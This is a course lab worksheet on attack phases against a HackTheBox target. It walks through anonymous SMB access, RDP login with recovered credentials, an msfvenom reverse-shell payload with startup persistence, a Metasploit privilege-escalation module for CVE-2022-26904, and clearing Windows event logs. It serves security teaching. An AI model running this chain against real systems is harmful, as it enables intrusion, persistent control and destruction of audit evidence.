Cyber Security Attack & Defence

School of Information Technology

UNCONTROLLED
COPY

P14 – Maintaining Access and Covering Tracks

Overview

Hacking attack can be divided broadly into FIVE phases: Reconnaissance,

Scanning, Gaining Access, Maintaining Access and Covering Tracks. All five phases
are not necessarily sequential. This workshop will summarize and cover the five
phases of the attacks.

Objectives

The objective of this lab is to help students gain understanding to the phases of
hacking to formulate effective defensive strategy against intrusion.

Reference:

www.kali.org
www.nmap.org
www.metasploit.com

Page 1 of 5
 Cyber Security Attack & Defence

PART A: Gaining Access

We will use HackTheBox SuperProfile machine for this lab.

Let’s start off by checking out what ports are open on this target.

1. Record the ports you find that could be of interest:

2. Let’s check out one of the services: SMB

3. Run a command that you have learnt previously to list out the available shares
anonymously.

Record down the command that would give you that information.

4. From what you have gathered from the shares, there is one that looks bare, at least to
me.

5. Let’s go check it out.

Running smbclient -N //<IP Address>/<share> should get me inside. I think… (“ .)

6. Okay, let’s just assume you got into it the correct share by now. We notice some kind of
user ID and password. Now download the file into your Kali and check it out.

Record what’s found in the file.

7. There was one other exciting port that we found in Q1. Let’s try that out with the
credentials we found that allows remote desktop connections.

Running xfreerdp /u:<userid> /p:<password> /v:<IP Address> should do the job.

Page 2 of 5
 Cyber Security Attack & Defence

PART B: Maintaining Access

After gaining access to a system, it is a good idea to maintain access to the system so that the
compromised system can be used for further examination or even used as a pivot to attack other
machines in the network.

Alright, here we will summon our knowledge of our favorite tool. The MSFVENOM.

1. But first, we need to answer a few critical questions about our target VM that we need to
create our MSFVENOM file.

Operating System
System Type (x86/x64)

2. Now that we have this information, I’m sure you can create your own MSFVENOM on your Attacker
machine.

Running msfvenom -p <operating system>/<type>/meterpreter/reverse_tcp

LHOST=<VPN/tun0 IP> LPORT=4444 -f exe -o <whateverfilenameyouwant>.exe

note: there is no x86 input option, just leave it blank if for some reasons you manage to assume
the victim is a x86 machine.

e.g. for x86 should look like this windows/meterpreter/reverse_tcp

3. Find a way to upload/copy/paste/put the newly created <whateverfilenameyouwant>.exe into

the victim machine.

4. Propose a comfortable place that you can put this <whateverfilenameyouwant>.exe into and
how it can be run each time the victim restarts the machine.

5. Now that we have settled all that, let’s enable a listener working on the Attacker machine before
you execute the <whateverfilenameyouwant>.exe.

• msfconsole
• use exploit/multi/handler
• set payload <operating system>/<type>/meterpreter/reverse_tcp
• set LHOST tun0
• set LPORT 4444
• run

6. Now you can run the <whateverfilenameyouwant>.exe from the victim machine.

7. With some luck and maybe some expertise of yours, the victim should be executing your
executable file every time the machine restarts or when the user logs in. You can manually
trigger a restart on this HTB to see if it automatically executes it and comes back to your
listener.

Page 3 of 5
 Cyber Security Attack & Defence

8. After some checking on the victim machine, you find out the Windows 11 build is 21H2. With some
quick research on Windows 11 build 21H2, you found out 21H2 build is affected by CVE-2022-
26904.

9. Without any hesitation and questions, you proceed with the following steps:

• on the existing meterpreter

• background
(take note of the session number that’s being sent to the background)
• use exploit/windows/local/cve_2022_26904_superprofile
• set payload windows/x64/meterpreter/reverse_tcp
• set LOGINUSER rbolton
• set LOGINPASSWORD <rbolton’s password>
• set SESSION <#>
(input the same session number that was sent to the background)
• set LHOST tun0
• set AutoCheck false
• run

10. Wait for the exploit to complete running.

11. Once you get a shell, type getuid and you should see that you are now running on a SYSTEM
account.

At this point, you have successfully escalated your privileges on the victim machine.

To complete this lab, you should continue with Part C now.

Page 4 of 5
 Cyber Security Attack & Defence

PART C: Covering Tracks

1. Event Viewer, a component of Microsoft's Windows NT line of operating systems, lets

administrators and users view the event logs on a local or remote machine. From the
attacker's perspective, it is best not for the activities performed on a compromised
machine. Log into Target VM and check the Windows event log using the Event
Viewer.

2. Search for the Event Viewer on the victim machine → Select Windows Logs →
Application.

3. Here you can see a bunch of logs, with errors… that could raise some
suspicions… let’s just try to clear them up so no one notices the errors.

4. Running clearev on an existing meterpreter should do it

Paste your output of the command below:

5. Go back to the victim’s Event Viewer, it is now blank. GGWP.

This is the end of the lab. However, do think about how empty event logs could
also raise suspicions from more experienced administrators.

~~ ** The End ** ~~

Page 5 of 5